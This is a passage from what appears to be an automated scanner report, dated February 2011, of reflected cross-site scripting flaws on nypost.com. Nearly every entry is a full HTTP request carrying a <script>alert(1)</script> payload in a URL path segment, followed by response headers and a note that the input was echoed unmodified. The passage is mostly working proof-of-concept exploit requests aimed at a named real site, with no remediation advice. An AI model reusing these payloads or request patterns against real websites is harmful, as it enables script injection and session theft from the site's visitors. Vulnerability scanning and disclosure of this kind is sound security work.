GET /Resource/SysConfig/WebPortal/nypost/blocks/story_lists/story_lists.css13595<script>alert(1)</script>a60d047bf8f HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 727 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:41 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ca9a2<script>alert(1)</script>89ade525ba6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfigca9a2<script>alert(1)</script>89ade525ba6/WebPortal/nypost/blocks/story_tabs/story_tabs_ie.css HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; tracklink=; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.4.10.1297130884;
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 728 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 05:44:54 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4d1f8<script>alert(1)</script>bd952773cbe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal4d1f8<script>alert(1)</script>bd952773cbe/nypost/blocks/story_tabs/story_tabs_ie.css HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; tracklink=; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.4.10.1297130884;
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 728 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 05:44:57 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 36a8b<script>alert(1)</script>1f34a8357cb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost36a8b<script>alert(1)</script>1f34a8357cb/blocks/story_tabs/story_tabs_ie.css HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; tracklink=; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.4.10.1297130884;
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 728 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 05:45:02 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ddeb2<script>alert(1)</script>f821da0b4eb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocksddeb2<script>alert(1)</script>f821da0b4eb/story_tabs/story_tabs_ie.css HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; tracklink=; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.4.10.1297130884;
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 728 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 05:45:06 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2bc16<script>alert(1)</script>d5b81a09fe0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig2bc16<script>alert(1)</script>d5b81a09fe0/WebPortal/nypost/blocks/todays_cover/todays_cover.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 729 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:08 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 17aa5<script>alert(1)</script>038c8e8a38c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal17aa5<script>alert(1)</script>038c8e8a38c/nypost/blocks/todays_cover/todays_cover.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 729 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:10 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 300d9<script>alert(1)</script>de65da3d22 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost300d9<script>alert(1)</script>de65da3d22/blocks/todays_cover/todays_cover.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 728 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:12 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5f8df<script>alert(1)</script>5e232f0ad2b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks5f8df<script>alert(1)</script>5e232f0ad2b/todays_cover/todays_cover.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 729 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:19 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 67d41<script>alert(1)</script>4095da2a068 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/todays_cover67d41<script>alert(1)</script>4095da2a068/todays_cover.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 729 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:24 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 55d7e<script>alert(1)</script>2f392b5bc5e was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/todays_cover/todays_cover.css55d7e<script>alert(1)</script>2f392b5bc5e HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 729 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:25 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2e782<script>alert(1)</script>947df1f99ad was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig2e782<script>alert(1)</script>947df1f99ad/WebPortal/nypost/blocks/top_story/default_photo.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 727 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:28 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5d71d<script>alert(1)</script>21e0f9d741 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal5d71d<script>alert(1)</script>21e0f9d741/nypost/blocks/top_story/default_photo.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 726 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:31 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2150d<script>alert(1)</script>094611fd17a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost2150d<script>alert(1)</script>094611fd17a/blocks/top_story/default_photo.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 727 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:33 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload aa929<script>alert(1)</script>b0a94806a5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocksaa929<script>alert(1)</script>b0a94806a5/top_story/default_photo.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 726 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:35 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload d5f62<script>alert(1)</script>b9babe94117 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/top_storyd5f62<script>alert(1)</script>b9babe94117/default_photo.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 727 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:37 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload dc03e<script>alert(1)</script>b89ce48fcec was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/top_story/default_photo.cssdc03e<script>alert(1)</script>b89ce48fcec HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 727 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:38 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 45225<script>alert(1)</script>7daa30c527 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig45225<script>alert(1)</script>7daa30c527/WebPortal/nypost/blocks/top_story/top_story_default.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 730 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:31 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f0dd7<script>alert(1)</script>62fcea1f4b0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortalf0dd7<script>alert(1)</script>62fcea1f4b0/nypost/blocks/top_story/top_story_default.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 731 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:33 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 45696<script>alert(1)</script>ab0d93b4f5f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost45696<script>alert(1)</script>ab0d93b4f5f/blocks/top_story/top_story_default.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 731 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:35 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 94c19<script>alert(1)</script>15c969eb1fb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks94c19<script>alert(1)</script>15c969eb1fb/top_story/top_story_default.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 731 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:37 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 60451<script>alert(1)</script>16f310637d2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/top_story60451<script>alert(1)</script>16f310637d2/top_story_default.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 731 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:39 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 8650f<script>alert(1)</script>d932ec1b69 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/top_story/top_story_default.css8650f<script>alert(1)</script>d932ec1b69 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 730 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:43 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 43a61<script>alert(1)</script>b8d2cd6ca52 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig43a61<script>alert(1)</script>b8d2cd6ca52/WebPortal/nypost/blocks/top_story/video/top_story_video.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 735 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:15 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a34b8<script>alert(1)</script>8a92205488c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortala34b8<script>alert(1)</script>8a92205488c/nypost/blocks/top_story/video/top_story_video.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 735 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:20 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4c900<script>alert(1)</script>c367d9630d2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost4c900<script>alert(1)</script>c367d9630d2/blocks/top_story/video/top_story_video.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 735 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:22 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 243be<script>alert(1)</script>e0e4d5cffc5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks243be<script>alert(1)</script>e0e4d5cffc5/top_story/video/top_story_video.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 735 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:24 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 5a4d1<script>alert(1)</script>80ae711010d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/top_story5a4d1<script>alert(1)</script>80ae711010d/video/top_story_video.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 735 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:26 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 51cc9<script>alert(1)</script>0f28129027c was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/top_story/video51cc9<script>alert(1)</script>0f28129027c/top_story_video.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 735 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:27 GMT Connection: close
The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload 1be2f<script>alert(1)</script>dd560a15c03 was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
